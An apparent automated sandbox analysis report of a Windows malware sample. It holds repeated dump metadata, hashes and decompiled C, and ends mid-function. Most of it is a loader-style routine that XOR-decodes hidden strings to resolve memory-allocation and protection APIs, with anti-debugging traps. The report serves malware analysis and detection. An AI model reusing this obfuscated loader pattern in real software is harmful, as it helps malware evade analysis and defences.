                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 66e06a8405d19af7ff67c95c779330ff9e611b2bd490bf4d5950272d61a8962a
                                                                                                                                                                                                                                • Instruction ID: 9235563cd632021892a3c8146a2eadf4722a4b88a27f35216d4a005117610f7c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 66e06a8405d19af7ff67c95c779330ff9e611b2bd490bf4d5950272d61a8962a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1FB012A279C1017D3148B2449E0AD37025CC4D0B30330861BF000C11C0E4402C440333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA5C, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA5C() {

				E00A8ABE6(0xa8c2c4, 0xa8d100); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: ec53f42004067fb6561d6e2ae5fb6e9abb623538ed04643fcc9bd18d52d3525e
                                                                                                                                                                                                                                • Instruction ID: 67b58c00fbeebf268d7df8a8c1c7f1cae78fc8821e8a4f9bae7314eccb1d5d50
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec53f42004067fb6561d6e2ae5fb6e9abb623538ed04643fcc9bd18d52d3525e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CB012A279C0017D3108B2445E0AD37021CD4D0F20330851BF000C11C0E4402C040333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AA52, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AA52() {

				E00A8ABE6(0xa8c2c4, 0xa8d104); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8aa3f
                                                                                                                                                                                                                                0x00a8aa46

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AA3F
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: e86bbd4080c3c48f3d957183c475005286ef3a2b74908cb6209597f727e7cfc7
                                                                                                                                                                                                                                • Instruction ID: b8d69ecb3aca5ceeac04166ee2d9c14f6883fe13afa23e576c507f95a1d38c3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e86bbd4080c3c48f3d957183c475005286ef3a2b74908cb6209597f727e7cfc7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9B012A279C0017D3108B2445F4AD37021CC4D0B20330851BF000C11C0E4402C050333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AB22, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AB22() {

				E00A8ABE6(0xa8c344, 0xa8d134); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8ab19
                                                                                                                                                                                                                                0x00a8ab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 274769cf9ce8c97e26eda281d7e5e473bbc853614dba641ec001bec851d96294
                                                                                                                                                                                                                                • Instruction ID: 449485563ac174d0fabcf58f9a2407a9840f153a75586997a96cd9926492f311
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 274769cf9ce8c97e26eda281d7e5e473bbc853614dba641ec001bec851d96294
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04B0129135E001BD310871082E0FC36021ED4E0B20330C52FF000C9180D4502C020333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A8AB07, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A8AB07() {

				E00A8ABE6(0xa8c344, 0xa8d124); // executed
				goto __eax;
			}



                                                                                                                                                                                                                                0x00a8ab19
                                                                                                                                                                                                                                0x00a8ab20

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00A8AB19
                                                                                                                                                                                                                                  • Part of subcall function 00A8ABE6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A8AC5F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 123106877-0
                                                                                                                                                                                                                                • Opcode ID: 44f0e0dbdd37a975bac5ea4a977f22782d789e392da236d35532163982aa5c7b
                                                                                                                                                                                                                                • Instruction ID: dcdf219875dc57e2cf71c0e8ada73fcefdd31ed64b087bc962513f090ad41c84
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44f0e0dbdd37a975bac5ea4a977f22782d789e392da236d35532163982aa5c7b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0B012A135C001BD710471042E4FC36025DD4F0B20330C52FF000C8081D4512C020333
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A85157, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A85157(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0xa8d270, 0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                0x00a85163
                                                                                                                                                                                                                                0x00a85169

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: 92728a643f62c94dde93264c6dbdbb2a7b1ea0690963e63db71b05eb9ee9ac78
                                                                                                                                                                                                                                • Instruction ID: 8ccf1c8a2c3244c91eebf8ec42bb669f6a8f3c078b4e0da1d06fa95bcf7823f4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92728a643f62c94dde93264c6dbdbb2a7b1ea0690963e63db71b05eb9ee9ac78
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32B012B1400100FBCE11CB90DE08F057B71B750710F014011B205400B0C2314426FF14
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 736D489D, Relevance: 51.1, Strings: 40, Instructions: 1071COMMONCrypto
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 96%
                                                                                                                                                                                                                                			E736D489D(void* __edi, void* __eflags, char _a5, char _a9, intOrPtr _a13, intOrPtr _a17, char _a21, char _a25, intOrPtr _a29, intOrPtr _a33, char _a37, char _a41, intOrPtr _a45, intOrPtr _a49, char _a53, char _a57, intOrPtr _a61, intOrPtr _a65, char _a69, char _a73, intOrPtr _a77, intOrPtr _a81, char _a85, char _a89, char _a109, char _a125, char _a129, intOrPtr _a133, intOrPtr _a137, intOrPtr _a141, char _a145, char _a149, intOrPtr _a153, intOrPtr _a157, intOrPtr _a161, char _a165, char _a169, intOrPtr _a173, intOrPtr _a177, intOrPtr _a181, char _a185, char _a189, intOrPtr _a193, intOrPtr _a197, intOrPtr _a201, char _a205, char _a209, intOrPtr _a213, intOrPtr _a217, intOrPtr _a221, char _a225, char _a229, intOrPtr _a233, intOrPtr _a237, intOrPtr _a241, char _a245, char _a249, intOrPtr _a253, intOrPtr _a257, intOrPtr _a261, char _a265, char _a269, intOrPtr _a273, intOrPtr _a277, intOrPtr _a281, char _a285, char _a289, intOrPtr _a293, intOrPtr _a297, intOrPtr _a301, char _a305, char _a309, intOrPtr _a313, intOrPtr _a317, intOrPtr _a321, char _a325, char _a329, intOrPtr _a333, intOrPtr _a337, intOrPtr _a341, char _a345, char _a349, intOrPtr _a353, intOrPtr _a357, intOrPtr _a361, char _a365, char _a369, intOrPtr _a373, intOrPtr _a377, intOrPtr _a381, char _a385, char _a389, intOrPtr _a393, intOrPtr _a397, intOrPtr _a401, char _a405, char _a409, intOrPtr _a413, intOrPtr _a417, intOrPtr _a421, char _a425, char _a429, intOrPtr _a433, intOrPtr _a437, intOrPtr _a441, char _a445, char _a449, intOrPtr _a453, intOrPtr _a457, intOrPtr _a461, char _a465, char _a469, intOrPtr _a473, intOrPtr _a477, intOrPtr _a481, char _a485, char _a489, intOrPtr _a493, intOrPtr _a497, intOrPtr _a501, char _a505, char _a509, intOrPtr _a513, intOrPtr _a517, intOrPtr _a521, char _a525, char _a529, intOrPtr _a533, intOrPtr _a537, intOrPtr _a541, intOrPtr _a545, char _a549, char _a553, intOrPtr _a557, intOrPtr _a561, intOrPtr _a565, intOrPtr _a569, char _a573, char _a577, intOrPtr _a581, intOrPtr _a585, intOrPtr _a589, intOrPtr _a593, intOrPtr _a597) {
				char _v1;
				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				char _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				char _v520;
				char* _t514;
				char* _t515;
				char* _t519;
				char* _t520;
				char* _t524;
				char* _t525;
				char* _t529;
				char* _t530;
				char* _t534;
				char* _t535;
				char* _t539;
				char* _t540;
				char* _t544;
				char* _t545;
				char* _t549;
				char* _t550;
				char* _t554;
				char* _t555;
				char* _t559;
				char* _t560;
				char* _t564;
				char* _t565;
				char* _t569;
				char* _t570;
				char* _t574;
				char* _t575;
				char* _t579;
				char* _t580;
				char* _t584;
				char* _t585;
				void* _t705;
				void* _t707;
				void* _t709;
				void* _t711;
				void* _t713;
				void* _t715;
				void* _t717;
				void* _t719;
				void* _t721;
				void* _t723;
				void* _t725;
				void* _t727;
				void* _t729;
				void* _t731;
				void* _t733;
				void* _t735;
				void* _t737;
				void* _t739;
				void* _t741;
				void* _t743;
				void* _t745;
				void* _t747;
				void* _t749;
				void* _t751;
				void* _t753;
				void* _t755;
				void* _t757;
				void* _t759;
				void* _t761;
				void* _t763;
				signed int _t765;
				signed int _t766;
				signed int _t767;
				signed int _t768;
				signed int _t769;
				signed int _t770;
				signed int _t771;
				signed int _t772;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				signed int _t785;
				signed int _t786;
				signed int _t787;
				signed int _t788;
				signed int _t789;
				signed int _t790;
				signed int _t791;
				signed int _t792;
				signed int _t793;
				signed int _t794;
				void* _t796;
				signed int _t800;
				void* _t801;
				void* _t802;
				void* _t803;
				void* _t804;
				void* _t805;
				void* _t806;
				void* _t807;
				void* _t808;
				void* _t809;
				void* _t810;
				void* _t811;
				void* _t812;
				void* _t813;
				void* _t814;
				void* _t815;
				void* _t816;

				_t796 = __edi;
				asm("int1");
				if(__eflags > 0) {
					asm("in eax, 0x5e");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push( &_v1);
					_t800 = (_t800 & 0xfffffff8) - 0x258;
					_v500 = 0;
					_v496 = 0x442c1809;
					_v492 = 0x384d1107;
					_v488 = 0x6612396c;
					_v484 = 0xa7e5d42;
					if(_v500 == 0) {
						_t794 = 0;
						do {
							 *(_t800 + 0x6c + _t794 * 4) =  *(_t800 + 0x6c + _t794 * 4) ^ 0x0a7e5d42;
							_t794 = _t794 + 1;
						} while (_t794 < 4);
					}
					_v520 = 0;
					_v516 = 0x55905f81;
					_v512 = 0x608e57a2;
					_v508 = 0x428d5abb;
					_v504 = 0x21e236d7;
				}
				_t801 = _t800 + 1;
				asm("xlatb");
				asm("loop 0x24");
				if(_a85 == 0) {
					_t793 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t801 + 0x58 + _t793 * 4) =  *(_t801 + 0x58 + _t793 * 4) ^ 0x21e236d7;
						_t793 = _t793 + 1;
					} while (_t793 < 4);
				}
				E736D7DE0(_t796, "VirtualAlloc", 0, 0x200);
				_t705 = 0;
				 *0x736efd48 = 0;
				_t802 = _t801 + 0xc;
				_t514 =  &_a89;
				if(_a89 != 0) {
					do {
						_t514 = _t514 + 1;
						_t705 = _t705 + 1;
					} while ( *_t514 != 0);
				}
				_t706 = _t705 + 1;
				if(_t705 + 1 != 0) {
					E736D82C0("VirtualAlloc",  &_a89, _t706);
					_t802 = _t802 + 0xc;
				}
				_t707 = 0;
				_t515 =  &_a109;
				if(_a109 != 0) {
					do {
						_t515 = _t515 + 1;
						_t707 = _t707 + 1;
					} while ( *_t515 != 0);
				}
				_t708 = _t707 + 1;
				if(_t707 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a109, _t708);
					_t802 = _t802 + 0xc;
				}
				_a145 = 0;
				_a149 = 0x59114582;
				_a153 = 0x25704c8c;
				_a157 = 0x7b2f64e7;
				_a161 = 0x174300c9;
				if(_a145 == 0) {
					_t792 = 0;
					do {
						 *(_t802 + 0x94 + _t792 * 4) =  *(_t802 + 0x94 + _t792 * 4) ^ 0x174300c9;
						_t792 = _t792 + 1;
					} while (_t792 < 4);
				}
				_a125 = 0;
				_a129 = 0x1a6ef159;
				_a133 = 0x3e70f97a;
				_a137 = 0xb68f77d;
				_a141 = 0x6e1cec6c;
				if(_a125 == 0) {
					_t791 = 0;
					asm("o16 nop [eax+eax]");
					do {
						 *(_t802 + 0x80 + _t791 * 4) =  *(_t802 + 0x80 + _t791 * 4) ^ 0x6e1c980f;
						_t791 = _t791 + 1;
					} while (_t791 < 4);
				}
				E736D7DE0(_t796, "VirtualProtect", 0, 0x200);
				_t709 = 0;
				 *0x736eff4c = 0;
				_t803 = _t802 + 0xc;
				_t519 =  &_a129;
				if(_a129 != 0) {
					do {
						_t519 = _t519 + 1;
						_t709 = _t709 + 1;
					} while ( *_t519 != 0);
				}
				_t710 = _t709 + 1;
				if(_t709 + 1 != 0) {
					E736D82C0("VirtualProtect",  &_a129, _t710);
					_t803 = _t803 + 0xc;
				}
				_t711 = 0;
				_t520 =  &_a149;
				if(_a149 != 0) {
					do {
						_t520 = _t520 + 1;
						_t711 = _t711 + 1;
					} while ( *_t520 != 0);
				}
				_t712 = _t711 + 1;
				if(_t711 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a149, _t712);
					_t803 = _t803 + 0xc;
				}
				_a185 = 0;
				_a189 = 0x2150272;
				_a193 = 0x7e740b7c;
				_a197 = 0x202b2317;
				_a201 = 0x4c474739;
				if(_a185 == 0) {
					_t790 = 0;
					do {
						 *(_t803 + 0xbc + _t790 * 4) =  *(_t803 + 0xbc + _t790 * 4) ^ 0x4c474739;
						_t790 = _t790 + 1;
					} while (_t790 < 4);
				}
				_a165 = 0;
				_a169 = 0x5b9ae549;
				_a173 = 0x7e84ed6a;
				_a177 = 0x569ae96a;
				_a181 = 0x2fe88c1f;
				if(_a165 == 0) {
					_t789 = 0;
					do {
						 *(_t803 + 0xa8 + _t789 * 4) =  *(_t803 + 0xa8 + _t789 * 4) ^ 0x2fe88c1f;
						_t789 = _t789 + 1;
					} while (_t789 < 4);
				}
				E736D7DE0(_t796, "VirtualQuery", 0, 0x200);
				_t713 = 0;
				 *0x736f0150 = 0;
				_t804 = _t803 + 0xc;
				_t524 =  &_a169;
				if(_a169 != 0) {
					asm("o16 nop [eax+eax]");
					do {
						_t524 = _t524 + 1;
						_t713 = _t713 + 1;
					} while ( *_t524 != 0);
				}
				_t714 = _t713 + 1;
				if(_t713 + 1 != 0) {
					E736D82C0("VirtualQuery",  &_a169, _t714);
					_t804 = _t804 + 0xc;
				}
				_t715 = 0;
				_t525 =  &_a189;
				if(_a189 != 0) {
					do {
						_t525 = _t525 + 1;
						_t715 = _t715 + 1;
					} while ( *_t525 != 0);
				}
				_t716 = _t715 + 1;
				if(_t715 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a189, _t716);
					_t804 = _t804 + 0xc;
				}
				_a205 = 0;
				_a209 = 0x40b17d1a;
				_a213 = 0x3cd07414;
				_a217 = 0x628f5c7f;
				_a221 = 0xee33851;
				if(_a205 == 0) {
					_t788 = 0;
					do {
						 *(_t804 + 0xd0 + _t788 * 4) =  *(_t804 + 0xd0 + _t788 * 4) ^ 0x0ee33851;
						_t788 = _t788 + 1;
					} while (_t788 < 4);
				}
				_a5 = 0;
				_a9 = 0x2fe68666;
				_a13 = 0x1df88e45;
				_a17 = 0x5bf18a42;
				if(_a5 == 0) {
					_t787 = 0;
					do {
						 *(_t804 + 8 + _t787 * 4) =  *(_t804 + 8 + _t787 * 4) ^ 0x5b94ef30;
						_t787 = _t787 + 1;
					} while (_t787 < 3);
				}
				E736D7DE0(_t796, "VirtualFree", 0, 0x200);
				_t717 = 0;
				 *0x736f0354 = 0;
				_t805 = _t804 + 0xc;
				_t529 =  &_a9;
				if(_a9 != 0) {
					do {
						_t529 = _t529 + 1;
						_t717 = _t717 + 1;
					} while ( *_t529 != 0);
				}
				_t718 = _t717 + 1;
				if(_t717 + 1 != 0) {
					E736D82C0("VirtualFree",  &_a9, _t718);
					_t805 = _t805 + 0xc;
				}
				_t719 = 0;
				_t530 =  &_a209;
				if(_a209 != 0) {
					do {
						_t530 = _t530 + 1;
						_t719 = _t719 + 1;
					} while ( *_t530 != 0);
				}
				_t720 = _t719 + 1;
				if(_t719 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a209, _t720);
					_t805 = _t805 + 0xc;
				}
				_a245 = 0;
				_a249 = 0x6c321b09;
				_a253 = 0x10531207;
				_a257 = 0x4e0c3a6c;
				_a261 = 0x22605e42;
				if(_a245 == 0) {
					_t786 = 0;
					do {
						 *(_t805 + 0xf8 + _t786 * 4) =  *(_t805 + 0xf8 + _t786 * 4) ^ 0x22605e42;
						_t786 = _t786 + 1;
					} while (_t786 < 4);
				}
				_a225 = 0;
				_a229 = 0x37f22890;
				_a233 = 0x2e522a5;
				_a237 = 0x2ce3ea4;
				_a241 = 0x67863db6;
				if(_a225 == 0) {
					_t785 = 0;
					do {
						 *(_t805 + 0xe4 + _t785 * 4) =  *(_t805 + 0xe4 + _t785 * 4) ^ 0x67864dd7;
						_t785 = _t785 + 1;
					} while (_t785 < 4);
				}
				E736D7DE0(_t796, "GetProcessHeap", 0, 0x200);
				_t721 = 0;
				 *0x736f0558 = 0;
				_t806 = _t805 + 0xc;
				_t534 =  &_a229;
				if(_a229 != 0) {
					do {
						_t534 = _t534 + 1;
						_t721 = _t721 + 1;
					} while ( *_t534 != 0);
				}
				_t722 = _t721 + 1;
				if(_t721 + 1 != 0) {
					E736D82C0("GetProcessHeap",  &_a229, _t722);
					_t806 = _t806 + 0xc;
				}
				_t723 = 0;
				_t535 =  &_a249;
				if(_a249 != 0) {
					do {
						_t535 = _t535 + 1;
						_t723 = _t723 + 1;
					} while ( *_t535 != 0);
				}
				_t724 = _t723 + 1;
				if(_t723 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a249, _t724);
					_t806 = _t806 + 0xc;
				}
				_a265 = 0;
				_a269 = 0x536db481;
				_a273 = 0x2f0cbd8f;
				_a277 = 0x715395e4;
				_a281 = 0x1d3ff1ca;
				if(_a265 == 0) {
					_t784 = 0;
					do {
						 *(_t806 + 0x10c + _t784 * 4) =  *(_t806 + 0x10c + _t784 * 4) ^ 0x1d3ff1ca;
						_t784 = _t784 + 1;
					} while (_t784 < 4);
				}
				_a21 = 0;
				_a25 = 0x14ad5a47;
				_a29 = 0xba0534e;
				_a33 = 0x64cc3f6c;
				if(_a21 == 0) {
					_t783 = 0;
					do {
						 *(_t806 + 0x18 + _t783 * 4) =  *(_t806 + 0x18 + _t783 * 4) ^ 0x64cc3f0f;
						_t783 = _t783 + 1;
					} while (_t783 < 3);
				}
				E736D7DE0(_t796, "HeapAlloc", 0, 0x200);
				_t725 = 0;
				 *0x736f075c = 0;
				_t807 = _t806 + 0xc;
				_t539 =  &_a25;
				if(_a25 != 0) {
					do {
						_t539 = _t539 + 1;
						_t725 = _t725 + 1;
					} while ( *_t539 != 0);
				}
				_t726 = _t725 + 1;
				if(_t725 + 1 != 0) {
					E736D82C0("HeapAlloc",  &_a25, _t726);
					_t807 = _t807 + 0xc;
				}
				_t727 = 0;
				_t540 =  &_a269;
				if(_a269 != 0) {
					do {
						_t540 = _t540 + 1;
						_t727 = _t727 + 1;
					} while ( *_t540 != 0);
				}
				_t728 = _t727 + 1;
				if(_t727 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a269, _t728);
					_t807 = _t807 + 0xc;
				}
				_a285 = 0;
				_a289 = 0xa842660;
				_a293 = 0x76e52f6e;
				_a297 = 0x28ba0705;
				_a301 = 0x44d6632b;
				if(_a285 == 0) {
					_t782 = 0;
					do {
						 *(_t807 + 0x120 + _t782 * 4) =  *(_t807 + 0x120 + _t782 * 4) ^ 0x44d6632b;
						_t782 = _t782 + 1;
					} while (_t782 < 4);
				}
				_a37 = 0;
				_a41 = 0x217a618e;
				_a45 = 0x34616d95;
				_a49 = 0x511b04c6;
				if(_a37 == 0) {
					_t781 = 0;
					do {
						 *(_t807 + 0x28 + _t781 * 4) =  *(_t807 + 0x28 + _t781 * 4) ^ 0x511b04c6;
						_t781 = _t781 + 1;
					} while (_t781 < 3);
				}
				E736D7DE0(_t796, "HeapSize", 0, 0x200);
				_t729 = 0;
				 *0x736f0960 = 0;
				_t808 = _t807 + 0xc;
				_t544 =  &_a41;
				if(_a41 != 0) {
					do {
						_t544 = _t544 + 1;
						_t729 = _t729 + 1;
					} while ( *_t544 != 0);
				}
				_t730 = _t729 + 1;
				if(_t729 + 1 != 0) {
					E736D82C0("HeapSize",  &_a41, _t730);
					_t808 = _t808 + 0xc;
				}
				_t731 = 0;
				_t545 =  &_a289;
				if(_a289 != 0) {
					do {
						_t545 = _t545 + 1;
						_t731 = _t731 + 1;
					} while ( *_t545 != 0);
				}
				_t732 = _t731 + 1;
				if(_t731 + 1 != 0) {
					E736D82C0("KERNEL32.dll",  &_a289, _t732);
					_t808 = _t808 + 0xc;
				}
				_a305 = 0;
				_a309 = 0x386f5c37;
				_a313 = 0x440e5539;
				_a317 = 0x1a517d52;
				_a321 = 0x763d197c;
				if(_a305 == 0) {
					_t780 = 0;
					do {
						 *(_t808 + 0x134 + _t780 * 4) =  *(_t808 + 0x134 + _t780 * 4) ^ 0x763d197c;
						_t780 = _t780 + 1;
					} while (_t780 < 4);
				}
				_a53 = 0;
				_a57 = 0x2769f945;
				_a61 = 0x326dee4b;
				_a65 = 0x57089c0d;
				if(_a53 == 0) {
					_t779 = 0;
					do {
						 *(_t808 + 0x38 + _t779 * 4) =  *(_t808 + 0x38 + _t779 * 4) ^ 0x57089c0d;
						_t779 = _t779 + 1;
					} while (_t779 < 3);
				}
				E736D7DE0(_t796, "HeapFree", 0, 0x200);
				_t733 = 0;
				 *0x736f0b64 = 0;
				_t809 = _t808 + 0xc;
				_t549 =  &_a57;
				if(_a57 != 0) {
					do {
						_t549 = _t549 + 1;
						_t733 = _t733 + 1;
					} while ( *_t549 != 0);
				}
				_t734 = _t733 + 1;
				if(_t733 + 1 != 0) {
					E736D82C0("HeapFree",  &_a57, _t734);
					_t809 = _t809 + 0xc;
				}
				_t735 = 0;
				_t550 =  &_a309;
				if(_a309 != 0) {
					do {
